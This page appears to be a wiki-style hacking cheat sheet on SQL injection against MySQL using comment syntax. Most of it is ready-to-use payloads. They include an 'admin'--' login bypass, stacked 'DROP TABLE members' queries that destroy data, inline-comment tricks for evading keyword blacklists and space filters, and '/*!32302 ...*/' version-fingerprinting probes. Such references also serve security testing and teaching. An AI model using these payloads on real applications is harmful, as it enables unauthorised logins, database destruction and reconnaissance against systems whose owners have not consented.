====== Hacking - SQL Injection - MySQL - Comments ======
===== Line Comments =====
Comments out rest of the query.
Line comments are generally useful for ignoring rest of the query so you don't have to deal with fixing the syntax.
DROP sampletable;--
DROP sampletable;#
----
Line Comments Sample SQL Injection Attacks
Username: admin'--
SELECT * FROM members WHERE username = 'admin'--' AND password = 'password'
This is going to log you as admin user, because rest of the SQL query will be ignored.
----
===== Inline Comments =====
Comment out rest of the query by not closing them or you can use for bypassing blacklisting, removing spaces, obfuscating and determining database versions.
/*Comment Here*/
DROP/*comment*/sampletable
DR/**/OP/*bypass blacklisting*/sampletable
SELECT/*avoid-spaces*/password/**/FROM/**/Members
----
==== Special Comment Syntax for MySQL ====
This is a special comment syntax for MySQL.
/*! MYSQL Special SQL */
It's perfect for detecting MySQL version. If you put a code into this comments it's going to execute in MySQL only. Also you can use this to execute some code only if the server is higher than supplied version.
SELECT /*!32302 1/0, */ 1 FROM tablename
----
==== Classical Inline Comment SQL Injection Attack Samples ====
ID: 10; DROP TABLE members /*
Simply get rid of other stuff at the end the of query. Same as:
10; DROP TABLE members --
----
==== Division by 0 error ====
SELECT /*!32302 1/0, */ 1 FROM tablename
Will throw a division by 0 error if MySQL version is higher than3.23.02
----
==== MySQL Version Detection Sample Attacks ====
ID: /*!32302 10*/
ID: 10
You will get the same response if MySQL version is higher than 3.23.02
SELECT /*!32302 1/0, */ 1 FROM tablename
Will throw a division by 0 error if MySQL version is higher than3.23.02
----